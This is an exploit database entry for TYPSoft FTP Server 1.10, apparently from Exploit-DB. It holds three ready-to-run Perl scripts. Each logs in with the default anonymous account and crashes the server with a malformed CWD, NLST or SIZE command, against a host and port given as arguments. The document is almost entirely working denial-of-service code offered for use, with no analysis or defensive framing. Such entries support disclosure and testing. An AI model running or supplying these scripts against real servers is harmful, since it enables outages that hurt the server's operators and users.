TYPSoft FTP Server 1.10 - Multiple Denial of Service Vulnerabilities

EDB-ID:

18469

CVE:





Platform:

Windows

Date:

2012-02-07


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

#!/usr/bin/perl

# Exploit Title: Typsoft FTP Server DoS CWD command
# Date: 02/06/2012
# Author: Balazs Makany
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows 7
# (does not work on Windows XP)
#
# Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
#

use IO::Socket;

$user = "USER anonymous\r\n";
$passw = "PASS anonymous@127.0.0.1\r\n";
$command = "CWD ";
$dos_input = "."x250;
$send = "\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);

$socket->recv($serverdata, 1024);
print $serverdata;

$socket->send($user);
$socket->recv($serverdata, 1024);
$socket->send($passw);
$socket->recv($serverdata, 1024);
$socket->send($command.$dos_input.$send);


#!/usr/bin/perl

# Exploit Title: Typsoft FTP Server DoS NLST command
# Date: 02/06/2012
# Author: Balazs Makany
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows 7 
# (does not work on Windows XP)
#
# Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
#

use IO::Socket;

$user = "USER anonymous\r\n";
$passw = "PASS anonymous@127.0.0.1\r\n";
$command = "NLST ";
$dos_input = "/.../.../.../.../.../";
$send = "\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);

$socket->recv($serverdata, 1024);
print $serverdata;

$socket->send($user);
$socket->recv($serverdata, 1024);
$socket->send($passw);
$socket->recv($serverdata, 1024);
$socket->send($command.$dos_input.$send);


#!/usr/bin/perl

# Exploit Title: Typsoft FTP Server DoS SIZE command
# Date: 02/06/2012
# Author: Balazs Makany
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows 7
# (does not work on Windows XP)
#
# Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
#

use IO::Socket;

$user = "USER anonymous\r\n";
$passw = "PASS anonymous@127.0.0.1\r\n";
$command = "SIZE ";
$dos_input = "/.../.../.../.../.../";
$send = "\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);

$socket->recv($serverdata, 1024);
print $serverdata;

$socket->send($user);
$socket->recv($serverdata, 1024);
$socket->send($passw);
$socket->recv($serverdata, 1024);
$socket->send($command.$dos_input.$send);